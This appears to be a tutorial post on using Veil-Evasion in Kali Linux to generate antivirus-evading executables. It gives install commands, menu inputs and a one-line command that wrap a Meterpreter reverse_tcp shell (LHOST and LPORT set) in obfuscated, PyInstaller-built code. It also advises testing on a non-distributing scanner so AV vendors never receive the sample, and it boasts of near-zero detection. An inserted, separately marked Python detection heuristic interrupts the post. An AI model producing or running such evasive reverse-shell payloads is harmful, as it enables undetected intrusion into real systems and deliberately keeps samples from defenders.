Evading Antivirus using Veil-Framework in Kali Linux

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.

Veil-Evasion is a tool that generates payload executables designed to bypass common antivirus solutions by building each payload with randomness. Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it is part of the Veil super project at https://github.com/Veil-Framework/Veil, which we recommend most users clone and install.

It can also use payloads from the Metasploit Framework, supports both x86 and x64 architectures, and can be updated from either the command line or the menu.

If you want to install Veil in your own environment you can use the commands below:

#wget -c -O master.zip https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master

#unzip -q master.zip

#cd Veil-Evasion-master/setup

#./setup.sh

After Veil is installed, just run it with the command below:

#./Veil-Evasion.py

Change to the “Veil-Master” directory and launch the ./Veil-Evasion.py Python script. The Veil menu appears; at the time of writing it offers 31 payloads:

You can obtain a list of all the payloads with the “list” command:

[>] Please enter a command: list

[>] Please enter a command: use 27

[>] Please enter a command: set use_pyherion  Y

The payloads include PyInjector-style payload injection, with or without encryption, and PowerShell injection of payloads. PyInjector creates a Python executable with an embedded ASCII payload, but it uses standard Windows API calls to put the payload in memory and execute it.

Both of these methods are very effective for AV evasion. I am going to use the python/b64_substitution payload. This method uses the PyInjector style of injection with substitution of the payload. I type “use 27” and press Enter. It loads that component, as shown below:

[>] Please enter a command: generate

After issuing the generate command, wait while the shellcode is generated.

Now we select msfvenom by typing “1”:

[>] Please enter the number of your choice :  1

After that we need to type some details:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

Enter value for ‘LPORT’: “443”

Press Enter, and Veil asks for the name of our payload; in this case, “undetectable”.

We use PyInstaller, which produces a .exe. For this, type “1”:

[>] Please enter the number of your choice :  1

Next, I issue the “generate” command and press enter to create the executable.

The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.
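As an added example (not from the post or from the Veil project), here is a small Python heuristic that flags the traits the post attributes to Veil's generated source: randomized identifiers, a long base64 literal, and ctypes imported alongside a decoder. The thresholds, the sample scripts, and the assumption that the Windows API calls go through ctypes are mine, for illustration.

```python
import ast
import base64
import re

# Standard base64 alphabet, at least 200 characters, optional padding.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")

def looks_random(name):
    # Few vowels or many upper/lower flips suggests a generated identifier (heuristic thresholds).
    letters = [c for c in name if c.isalpha()]
    if len(name) < 6 or not letters or name.startswith("__"):
        return False
    vowel_ratio = sum(c.lower() in "aeiou" for c in letters) / len(letters)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.15 or flips / len(letters) > 0.4

def scan_source(src):
    # Collect identifiers, imported modules and long base64-looking string literals.
    names, modules, blobs = set(), set(), 0
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Name):
            names.add(node.id)
        elif isinstance(node, (ast.FunctionDef, ast.ClassDef)):
            names.add(node.name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            blobs += bool(B64_BLOB.match(node.value))
        elif isinstance(node, ast.Import):
            modules.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom):
            modules.add((node.module or "").split(".")[0])
    random_ratio = sum(map(looks_random, names)) / len(names) if names else 0.0
    indicators = []
    if blobs:
        indicators.append("long_base64_literal")
    if len(names) >= 3 and random_ratio >= 0.5:
        indicators.append("randomized_identifiers")
    if {"ctypes", "base64"} <= modules:  # assumption: API calls go through ctypes
        indicators.append("ctypes_with_decoder")
    verdict = "suspicious" if len(indicators) >= 2 else "benign"
    return {"indicators": indicators, "random_ratio": round(random_ratio, 2), "verdict": verdict}

# Constructed samples: an ordinary script, and one shaped like the post's description of
# Veil output (random names, encoded blob). The blob is arbitrary bytes, not a payload.
BENIGN = "import json\ndef load_config(path):\n    with open(path) as fh:\n        return json.load(fh)\n"
BLOB = base64.b64encode(bytes(range(256)) * 2).decode()
SUSPECT = f'import ctypes\nimport base64\nqZvTkLoW = "{BLOB}"\nRxFuJbNe = base64.b64decode(qZvTkLoW)\nuLoqkZvT = len(RxFuJbNe)\n'
```

Running `scan_source` on each sample gives a "benign" verdict for BENIGN and a "suspicious" one with all three indicators for SUSPECT; the heuristic is a triage aid, not a replacement for an AV engine.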

Better still, Veil is accessible directly from the command line, so you don’t have to use the console menu to generate these payloads.

I can generate the same payload by running the following single command:

#./Veil-Evasion.py -l python -p python/b64_substitution -o trytofindthis --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.31.20 LPORT=443

With this command-line interface you can bypass Veil’s menu system and drive it from scripts.

The compiled executable ends up in “/root/Veil-master/output/compiled/”.

Veil’s developers ask that no payload be submitted to http://www.virustotal.com, to avoid distribution of samples to the anti-virus vendors. An alternative is vscan.novirusthanks.org, which scans suspicious files for malware and offers the option “Do not distribute the sample”.

Now that we have our executable, we submit it to vscan.novirusthanks.org. Remember to check “Do not distribute the sample”. If you do not check this option, or you submit the executable to http://www.virustotal.com, your file will be analysed and may be recognized by some anti-virus vendors.

As you can see in the picture above, hardly any of the anti-virus vendors detected our file as malicious. We got a detection rate of nearly 1%!